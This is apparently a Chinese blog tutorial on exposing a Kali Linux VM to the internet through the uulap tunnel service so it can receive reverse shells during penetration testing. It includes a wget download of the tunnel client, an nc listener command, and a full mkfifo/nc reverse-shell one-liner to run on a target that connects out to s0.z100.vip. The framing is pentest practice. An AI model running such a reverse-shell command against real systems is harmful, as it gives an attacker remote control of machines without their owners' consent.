通过内网穿透的方式让外网和你的kali互通

通常我们kali都是安装在虚拟机上的,且在内网,但是通常在真实的渗透测试中,我们的kali需要有个公网ip来反弹shell,如何实现呢,接下来就给大家介绍一款我常用的工具
1、https://console.uulap.com/ 注册登录控制台
2、如图开通一个免费的隧道
在这里插入图片描述
3.在kali下载客户端
wget https://www.uulap.com/download/nattunnel.linux.amd64/nattunnel
通过内网穿透的方式让外网和你的kali互通_第1张图片
4.启动客户端
在这里插入图片描述
通过内网穿透的方式让外网和你的kali互通_第2张图片
在这里插入图片描述
看到下图,说明已经映射成功
通过内网穿透的方式让外网和你的kali互通_第3张图片
尝试通过nc 反弹获取shell
本地监听4444端口
nc -lvp 4444
在这里插入图片描述
再目标机执行
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc s0.z100.vip 4787 >/tmp/f
各种反弹代码可再这里生成
在这里插入图片描述
可以看到,shell已经成功反弹回来了
通过内网穿透的方式让外网和你的kali互通_第4张图片

你可能感兴趣的:(linux,运维,服务器)